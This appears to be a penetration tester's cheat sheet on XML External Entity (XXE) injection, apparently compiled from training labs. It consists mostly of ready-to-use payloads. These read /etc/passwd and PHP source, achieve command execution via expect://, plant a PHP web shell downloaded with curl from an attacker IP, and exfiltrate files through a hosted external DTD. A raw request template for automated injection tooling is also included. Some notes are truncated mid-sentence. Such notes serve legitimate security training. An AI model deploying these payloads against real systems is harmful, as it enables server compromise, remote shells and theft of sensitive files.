XML External Entity (XXE) Injection: A vulnerability where unsanitized XML input from users can execute malicious actions. These attacks exploit the XML parser to access system files or perform network requests, potentially disclosing sensitive data or affecting backend server performance.
Example XML Document:
XML (Extensible Markup Language): A markup language for data storage and transfer across applications.
Structure: XML documents are tree structures with elements:
Root Element: The primary container (e.g., <email>).
Child Elements: Nested data fields (e.g., <date>, <time>).
Tags: Surround elements (<tag>value</tag>).
Entities: XML variables (e.g., < for <).
Attributes: Optional settings within tags (e.g., version="1.0").
Identify every functionality that processes an XML structure.
Attempt to inject a % to cause an error.
Test for simple XXE injection and check if it is reflected.
Error-based XXE
Error-based XXE using DTD
Exfiltrate files
Remote command execution
If you cannot define the DOCTYPE, attempt XInclude XXE.
If the application has functionality to process XML via SVG (e.g., image upload), attempt XXE via SVG files.
If in scope, try a DoS attack.
XXE Attacks
Test Vulnerability
Character to attempt: '%'
Attempt to define an entity without reference it and send the request to check if the application block external entities.
<!DOCTYPE test [
<!ENTITY xxe "Inlane Freight">
]>
<root>1</root>
Then attempt to define it.
<!DOCTYPE test [
<!ENTITY xxe "Inlane Freight">
]>
<root>&xxe;</root>
Reading Sensitive Files
Tip: In certain Java web applications, we may also be able to specify a directory instead of a file, and we will get a directory listing instead, which can be useful for locating sensitive files.
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
PHP applications.
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
<root>&xxe;</root>
Remote Code Execution with XXE
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
Intrusionz3r0@htb[/htb]$ echo '<?php system($_REQUEST["cmd"]);?>' > shell.php
Intrusionz3r0@htb[/htb]$ sudo python3 -m http.server 80
<!DOCTYPE email [
<!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
Note: We replaced all spaces in the above XML code with $IFS, to avoid breaking the XML syntax. Furthermore, many other characters like |, >, and { may break the code, so we should avoid using them.
Error Based XXE
Host a DTD file as follows:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
Payload Structure:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [<!ENTITY % xxe SYSTEM "https://exploit-0ae100e704be4820817c4d9a011a00d1.exploit-server.net/exploit">%xxe;]>
<stockCheck>
<productId>1</productId>
<storeId>1</storeId>
</stockCheck>
Error Based using DTD file
Once identified a valid payload either brute forcing via intruder or scripting then the final payload is as follows:
we can copy the HTTP request from Burp and write it to a file for the tool to use. We should not include the full XML data, only the first line, and write XXEINJECT after it as a position locator for the tool
POST /blind/submitDetails.php HTTP/1.1
Host: 10.129.201.94
Content-Length: 169
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: <http://10.129.201.94>
Referer: <http://10.129.201.94/blind/>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT
Note: Some web applications may default to a JSON format in HTTP request, but may still accept other formats, including XML. So, even if a web app sends requests in a JSON format, we can try changing the Content-Type header to application/xml, and then convert the JSON data to XML with an . If the web application does accept the request with XML data, then we may also test it against XXE vulnerabilities, which may reveal an unanticipated XXE vulnerability.
